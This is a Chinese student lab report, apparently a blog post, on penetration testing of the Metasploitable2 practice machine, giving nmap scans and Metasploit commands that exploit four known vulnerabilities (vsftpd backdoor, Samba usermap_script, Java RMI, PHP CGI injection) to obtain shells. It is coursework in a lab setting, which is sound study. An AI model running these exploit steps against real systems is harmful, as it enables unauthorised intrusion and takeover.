20222322 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

掌握使用Metasploit和nmap等工具进行前期渗透的方法,并利用四种特定的漏洞对靶机进行攻击。

(1)掌握Metasploit和nmap的用法
学习并熟悉Metasploit框架的基本操作,包括模块搜索(Search)、使用(Use)、展示选项(Show)、设置参数(Set)以及执行攻击(Exploit/run)的流程。

(2)学习前期渗透的方法
利用nmap等工具对目标主机进行主机发现,确定目标主机的IP地址和在线状态。
进行端口扫描,列出目标主机上开放的端口及其对应的服务。
扫系统版本,确定目标主机上运行的操作系统和服务软件的版本信息。
查找并确认目标主机上存在的已知漏洞,为后续的漏洞利用攻击做准备。

(3)利用四种漏洞对靶机进行攻击

  • Vsftpd源码包后门漏洞:利用特定版本的vsftpd服务器程序中的后门代码,触发后门监听6200端口,并执行任意代码。
  • SambaMS-RPC Shell命令注入漏洞:通过向Samba服务的MS-RPC接口提交恶意输入,利用未经过滤的用户输入执行任意命令,以nobody用户的权限获取对目标主机的控制权。
  • Java RMI SERVER命令执行漏洞:利用Java RMI Server的RMI注册表和RMI激活服务中的安全漏洞,执行远程代码,获取对目标主机的控制权。
  • PHP CGI参数执行注入漏洞:通过在请求参数中插入执行命令,利用CGI脚本未正确处理请求参数的漏洞,执行任意代码,获取对目标主机的控制权。

2.实验过程

2.1前期渗透

  1. 下载靶机Metasploitable2,并获取靶机ip地址。使用ipconfig得到地址为192.168.36.149。

  2. 在kali中打开msfconsole,输入以下命令发现主机。

search arp_sweep
use 0
set RHOSTS 192.128.36.0/24
run

找到了靶机!!!!

  1. 命令行输入nmap -p 1-2048 192.168.36.149查看靶机开放的端口。

或者使用Aux中的portscan/tcp,输入以下命令:

search portscan/tcp
use 0
set RHOSTS 192.168.36.149
exploit

  1. 扫描系统版本、漏洞
search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.1.8
exploit


目标主机运行的是Unix操作系统,版本为Samba 3.0.20-Debian,并使用SMBv1协议,存在已知漏洞。

2.2Vsftpd源码包后门漏洞(21端口)
打开msfconsole后输入以下命令:

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.36.149
run

再输入uname -a,pwd,id命令进行测试,可以看到已经获取靶机的shell,攻击成功。

2.3SambaMS-RPC Shell命令注入漏洞(端口139)
打开msfconsole后输入以下命令:

use exploit/multi/samba/usermap_script
set RHOST 192.168.36.149
exploit

再输入uname -a命令获取靶机的shell,攻击成功。

2.4Java RMI SERVER命令执行漏洞(1099端口)
经过前期渗透可以看见1099端口开放

在msfconsole中输入以下命令:

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.36.149
exploit
shell

输入命令whoami,得到结果root,说明攻击成功。

2.5PHP CGI参数执行注入漏洞(80端口)
在msfconsole中输入以下命令:

use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.36.149
exploit
shell

输入pwd、uname -a、id、dir等检测是否攻击成功,可以执行命令,说明攻击成功。

3.问题及解决方案

  • 问题1:发现主机的时候,一直没有找到,卡在之前的ip的网段的“.1”主机。
  • 问题1解决方案:发现两台虚拟机不在同一网段,将虚拟机换成NET模式,重新启动虚拟机即可。

4.学习感悟、思考等

这次渗透测试实验比较简单,几乎没有遇到问题,我亲自操作Metasploit和Nmap这两款工具,亲历了从信息收集、端口扫描到漏洞探测的全过程。Metasploit的模块化与自动化特性,简化了攻击流程,在面对不同类型的漏洞时,迅速找到对应的攻击模块,用简单的语句就能进行攻击,让我体验到站在巨人肩膀上解决问题的便捷与强大。实验过程中对漏洞的成功利用,增强了我的实践能力,也揭示了网络安全的脆弱性与保护的紧迫性,意识到持续学习与适应新技术对于维护网络安全至关重要。

posted @ 2024-11-19 18:12  天马行空20222322  阅读(14)  评论(0编辑  收藏  举报